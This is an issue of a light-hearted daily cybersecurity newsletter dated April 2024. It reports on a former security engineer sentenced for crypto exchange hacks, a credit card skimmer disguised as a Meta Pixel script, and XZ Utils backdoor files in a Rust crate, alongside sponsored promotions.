Shakeeb Ahmed gets 3 years for $12.3M theft

Apr 17 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Slight technical hitch with yesterdays mailer, its ok we weren’t hacked…. 😂

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s angling to keep you hooked on staying cyber-safe while you’re surfing the net 🎣🎣🎣

 Today’s hottest cybersecurity news stories:

  • 👮‍♂️ Former security engineer Shakeeb Ahmed gets 3 years for $12.3M theft 💰

  • ⚠️ Facebook users beware! Credit card skimmer LARPs as harmless tracker 💳

  • 🚪 XZ utils backdoor files infects popular liblzma-sys Rust crate in version 0.3.2 📦

What is this, Ahmed robbery? 👀😏💀

🚨 Former Engineer Sentenced for Cryptocurrency Exchange Hacks 🛡️

📉 Former security engineer Shakeeb Ahmed has been sentenced to three years in a U.S. prison for hacking two decentralised cryptocurrency exchanges in July 2022, pocketing over $12.3 million. Ahmed, who previously worked as a senior security engineer, utilised his expertise in smart contracts and blockchain audits to execute the hacks, as revealed by the U.S. Department of Justice.

🏙️ While Ahmed's employer remains undisclosed, it's known that he resided in Manhattan and previously worked at Amazon. Court documents indicate that Ahmed exploited security flaws in smart contracts, allowing him to inflate fees and syphon funds from the exchanges. He even attempted to negotiate with one exchange, offering to return most funds in exchange for their silence.

💸 CoinDesk reported that a portion of the stolen funds was returned anonymously, resembling a "white hat" gesture. In addition to targeting Crema Finance, Ahmed attacked Nirvana Finance, resulting in its shutdown after syphoning $3.6 million. Despite a bug bounty offer, Ahmed demanded more, leaving Nirvana uncompensated.

🔄 To cover his tracks, Ahmed laundered the stolen assets across different blockchains, using mixers like Samourai Whirlpool. As part of his sentence, he must serve jail time, undergo supervised release, and forfeit $12.3 million, paying over $5 million in restitution.

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Skim, skimmer, who's got the keys to my bimmer? 🎶🙃💀

🚨 Facebook-dwelling Credit Card Skimmer Disguised as Meta Pixel Tracker 💳

🛡️ Cybersecurity researchers have unearthed a cunning credit card skimmer concealed within a counterfeit Meta Pixel tracker script, aiming to elude detection. Injected into websites via customizable code tools like WordPress plugins and Magento admin panels, this malware masquerades as benign scripts, leveraging popular naming conventions like Google Analytics or JQuery.

🕵️‍♂️ The bogus Meta Pixel tracker script mimics its authentic counterpart but harbours JavaScript code that substitutes genuine domain references with malicious ones. Instead of "connect.facebook[.]net," it loads from "b-connected[.]com," hosting a malicious script ("fbevents.js") that stealthily snatches credit card details when users reach checkout pages.

💼 The compromised "b-connected[.]com" redirects data to another compromised site, "www.donjuguetes[.]es," highlighting the interconnected web of cyber threats.

🛡️ To thwart such attacks, experts recommend keeping websites updated, reviewing admin accounts regularly, and frequently updating passwords. Weak passwords and plugin vulnerabilities are often exploited by threat actors to gain elevated access and execute malicious activities.

🔍 This revelation coincides with Sucuri's disclosure of Magento Shoplift malware targeting WordPress and Magento sites. These sophisticated attacks, like the MageCart e-commerce malware, underscore the evolving tactics of cybercriminals, necessitating heightened vigilance and proactive security measures.

🎣 Catch of the Day!! 🌊🐟🦞

🃏 The Motley Fool: “Fool me once, shame on — shame on you. Fool me — you can't get fooled again.” Good ol’ George Dubya 😂 Let us tell who’s not fooling around though; that’s the Crüe 👀 at Motley Fool. You’d be a fool (alright, enough already! 🙈) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! 🐛 Kidding aside, if you check out their website they’ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets 🤑 (LINK)

🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway 🏞️😍 (LINK)

🌊 Digital Ocean: If you build it they will come. Nope, we’re not talking about a baseball field for ghosts 👻🍿 (Great movie, to be fair 🙈). This is the Digital Ocean who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can and you’re looking for somewhere to test things out or launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

Updating Rust is a must, must, MUST ⚠️⚠️⚠️

🚨 Backdoor Alert: XZ Utils Compromised by Test Files in Rust Crate 💻

🕵️‍♂️ Test files linked to the XZ Utils backdoor have infiltrated a Rust crate called liblzma-sys, according to recent revelations from Phylum. liblzma-sys, boasting over 21,000 downloads, offers Rust developers bindings to the liblzma implementation, a core component of XZ Utils data compression software. The affected version, 0.3.2, was singled out for scrutiny.

🛡️ "The current distribution (v0.3.2) on contains the test files for XZ that contain the backdoor," Phylum highlighted in a GitHub issue filed on April 9, 2024.

💼 In response to responsible disclosure, the contentious files ("tests/files/bad-3-corrupt_lzma2.xz" and "tests/files/good-large_compressed.lzma") were promptly removed from version 0.3.3 of liblzma-sys, released on April 10. The preceding version was swiftly withdrawn from the registry.

🔍 "The malicious tests files were committed upstream, but due to the malicious build instructions not being present in the upstream repository, they were never called or executed," stated Snyk in its advisory.

📉 The XZ Utils backdoor saga began when Microsoft engineer Andres Freund detected nefarious commits impacting versions 5.6.0 and 5.6.1, released in February and March 2024, respectively. The backdoor circumvented SSH authentication controls, potentially granting remote code execution privileges to attackers.

🛡️ According to SentinelOne researchers, the actor behind the backdoor, operating under the alias Jia Tan, gradually gained trust within the XZ Utils community over two years. The modus operandi involved subtle code changes aimed at enhancing the backdoor's sophistication and evading detection.

🌐 The multifaceted operation involved social engineering tactics, suggesting a coordinated effort using phoney developer accounts. Despite the early discovery and restoration of the XZ Utils repository, the intricate nature of the backdoor hints at a state-sponsored threat actor's involvement, raising concerns about future supply chain attacks.

🗞️ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think!

So long and thanks for reading all the phish!

Recent articles